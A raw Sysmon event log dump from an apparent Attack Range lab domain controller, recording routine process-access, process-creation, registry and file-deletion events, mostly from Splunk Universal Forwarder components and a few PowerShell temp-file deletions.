21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.898{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000024128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.944{4DB9351A-A2AB-60D3-1A06-00000000CF01}51366824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.913{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=709182941BD75271D06A1CAB7255C9B7,SHA256=A1EFE32F1A662D70C8C59303255F153E6019D11EF95DF2F120098ACDA55812C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.680{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000024141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:07:56.991{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x800000000000000024140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:07:56.991{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9F667F05-E98B-4538-82BE-6312C93AD303\Config SourceDWORD (0x00000001) 13241300x800000000000000024139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:07:56.991{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9F667F05-E98B-4538-82BE-6312C93AD303\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_9F667F05-E98B-4538-82BE-6312C93AD303.XML 10341000x800000000000000024138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.944{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.945{4DB9351A-A2AC-60D3-1B06-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.929{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9624D067B84716E656B9B53DF0470991,SHA256=50F037EF287A5FC07EAF4D66F59C71610438B358B19AAB9043C70DB0E553F41C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:56.694{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D29BBD09B2C1754A0D37509C6743F6DC,SHA256=364ABEC8183717D3D9E955D73D223110C025B9D260264FE85D921EB111DE94E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.976{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\grtzj3ew.sqvMD5=7C09F02F76DC730B02660289129643B9,SHA256=D1EF8BB7C9247B45A4775BF9670E2401D99F80F9EED7F5B5F5DB20E555AC1FBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.960{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\sbwn0pc2.h3aMD5=E03035327737E82CADD030EC3B31ED37,SHA256=EE3EB68CC16297C84B7A23E37013333AED3FA9FE4EF05334591B35B0B46D23C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.944{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\txgoflsn.k44MD5=FBEFEF4E10D20E77768ECE3AD46D76E4,SHA256=4ED1F804524EF106CEBDAF0EE438F8E8030BC6712204CF222F76D40AFCDEBD17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.913{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\x2mivsxb.vxsMD5=9782AA4C5536B3CC56ABA1AAE44C153C,SHA256=A6BE65D6BDFEABB8BFB59FAD868FAAEA9A324139A9DAF913C4CB99683C3FE2CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\qzfgpozu.ocjMD5=C6F13ED42AE5C0EF4EF3A5AEA74AEDFA,SHA256=705C76FD7AF58E9D58722FCBD2A2B961AC6EF6D6F36B731EE47D6D92EB9BDE66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 